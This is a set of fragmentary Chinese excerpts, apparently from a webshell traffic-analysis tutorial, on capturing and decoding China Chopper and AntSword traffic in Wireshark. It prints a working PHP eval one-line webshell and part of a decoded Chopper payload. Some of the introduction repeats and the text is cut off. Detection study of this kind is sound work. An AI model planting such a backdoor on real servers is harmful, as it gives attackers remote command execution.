目录中国菜刀蚁剑菜刀和蚁剑的一句话木马的流量都有一个特点，都没有加密的，使用wireshark抓包来分析。中国菜刀中国菜刀是一款经典的webshell管理工具，具有文件管理、数据库管理、虚拟终端等功能。这里以菜刀2016为例。在服务器准备php一句话木马：<?php@eval($_POST['pass']);?>

WebShell特征分析作者：HaiCheng@助安社区，关注公众号领取学习路线和资料。WebShell是黑客经常使用的一种恶意脚本，其目的是获得服务器的执行操作权限，常见的webshell编写语言为asp/jsp/php。主要用于网站管理，服务器管理，权限管理等操作。使用方法简单，只需要上传一个代码文件，通过网址访

WebShell特征分析作者：HaiCheng@助安社区，关注公众号领取学习路线和资料。​ WebShell是黑客经常使用的一种恶意脚本，其目的是获得服务器的执行操作权限，常见的webshell编写语言为asp/jsp/php。主要用于网站管理，服务器管理，权限管理等操作。使用方法简单，只需要上传一个代码文件，通过

中国菜刀虚拟机使用仅主机模式，开启apache服务，使用wireshark对此网卡进行抓包  追踪http数据流  base64解码得出<?php@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y&qu